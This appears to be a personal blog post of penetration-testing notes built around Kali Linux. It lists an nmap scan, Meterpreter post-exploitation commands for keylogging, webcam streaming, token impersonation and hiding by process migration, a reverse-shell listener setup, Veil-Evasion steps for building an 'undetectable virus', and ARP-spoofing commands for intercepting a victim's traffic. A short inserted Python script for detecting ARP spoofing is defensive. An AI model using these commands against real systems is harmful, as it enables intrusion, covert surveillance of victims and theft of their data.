A while back I was tasked with some penetration testing. I plan to put a collection of what I did here.

I use Kali Linux for my testing.

nmap

Here is an example of a command to scan for open ports on the 192.168.1.0 network (the -sS and -O options require root):

nmap -v -p 1-65535 -sV -O -sS -T4 -oX (path-to-xml.xml) 192.168.1.0/16

More nmap examples can be found here

Armitage

Open the listener like so:

  • Armitage>Listeners>Reverse (wait for)
  • enter the port you used in your exploit (virus)
  • type is meterpreter
  • The listener is now running

Once a machine is compromised, Armitage shows it with lightning bolts. Here are helpful things to do in Armitage:

  • Right-click the compromised machine and select Meterpreter X>Access>Pass Session. This creates another session; do this so you have a backup in case the one you are in crashes.
  • Select Meterpreter X>Pivoting>Setup, click the network you want and select Add Pivot. This sets up a pivot point for reaching machines accessible from the compromised machine.

Meterpreter Shell

getsystem – attempts to elevate your privileges to those of LOCAL SYSTEM

webcam_stream – plays a video stream from the webcam

webcam_list – lists webcams

keyscan_start – logs keystrokes (be sure to open another Meterpreter session before doing this, as it may crash the current one)

keyscan_stop – stops logging keystrokes

use incognito – loads the incognito extension for token impersonation etc.

list_tokens – lists available tokens (use incognito must be loaded first)

impersonate_token archq\\administrator – impersonates the specified token (use incognito must be loaded first)

getuid – shows the user the current session is running as

getsid – gets the SID of the user the process is running as

ps – lists processes

migrate PID – migrates into the given process; this helps hide your program

shell – drops you into cmd.exe on that Windows machine

Msfconsole Commands

msfupdate – updates the framework

To set up a reverse shell listener:

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST [your IP address]

set LPORT 4444

exploit

Veil-evasion

Use this to create your own undetectable virus (I don't know how well it hides now; it has been several years since I tested it).

You will want to set up a Meterpreter listener that this virus will connect to.

list

use 35 (or use python/shellcode_inject/aes_encrypt)

Configure the options, then type:

generate

Use the output file on the machine you want to compromise.

Man in the Middle Attack

Enable IP forwarding like so:

echo 1 > /proc/sys/net/ipv4/ip_forward

Now to setup the ARP spoof:

arpspoof -i eth0 -t [IP Address of Victim] [Router IP Address]

Then do the same in the opposite direction:

arpspoof -i eth0 -t [Router IP Address] [IP Address of Victim]

You can then use Wireshark to capture their traffic, or run the following command to see the pages they visit:

driftnet -i eth0

Once that is working, you can sniff traffic to and from that machine using:

driftnet -i eth0

wireshark

urlsnarf -i eth0
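From the defender's side, the two arpspoof commands above leave a clear trace: the router's IP and the victim's IP both start resolving to the attacker's MAC, and that one MAC answers for several IPs. The following is an added example (not part of the original notes) that checks captured ARP replies for those two signs; the tcpdump-style sample lines and all addresses in it are constructed.

```python
"""Flag ARP cache poisoning in captured ARP replies (added example).

Two signs are checked: an IP whose MAC binding changes, and one MAC
answering for more than one IP. Input lines follow tcpdump's ARP
reply format ("Reply <ip> is-at <mac>, length N").
"""
from collections import defaultdict

# Constructed sample: 192.168.1.1 (router) and 192.168.1.50 (victim) are
# legitimate; 00:11:22:33:44:55 is a spoofing host that later claims both.
SAMPLE_TCPDUMP = [
    "10:00:01.000000 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:01, length 28",
    "10:00:02.000000 ARP, Reply 192.168.1.50 is-at aa:bb:cc:00:00:50, length 28",
    "10:00:03.000000 ARP, Reply 192.168.1.7 is-at 00:11:22:33:44:55, length 28",
    "10:00:04.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28",
    "10:00:05.000000 ARP, Reply 192.168.1.50 is-at 00:11:22:33:44:55, length 28",
]


def parse_tcpdump_arp(lines):
    """Extract (ip, mac) pairs from tcpdump ARP reply lines; other lines are skipped."""
    pairs = []
    for line in lines:
        parts = line.split()
        if "is-at" in parts:
            i = parts.index("is-at")
            pairs.append((parts[i - 1], parts[i + 1].rstrip(",").lower()))
    return pairs


def detect_arp_spoof(replies):
    """Return alert strings for suspicious bindings seen in (ip, mac) replies."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append(f"binding change: {ip} moved from {prev} to {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(f"one MAC for many IPs: {mac} claims {sorted(mac_to_ips[mac])}")
    return alerts


def run_sample():
    """Run the detector over the constructed capture."""
    return detect_arp_spoof(parse_tcpdump_arp(SAMPLE_TCPDUMP))


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Static ARP entries for the gateway or dynamic ARP inspection on the switch stop the poisoning itself; this script only surfaces it in a capture.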

Enable Auto Login as Root

leafpad /etc/gdm3/daemon.conf

Uncomment these lines:
[daemon]
# Enabling automatic login
  AutomaticLoginEnable = true
  AutomaticLogin = root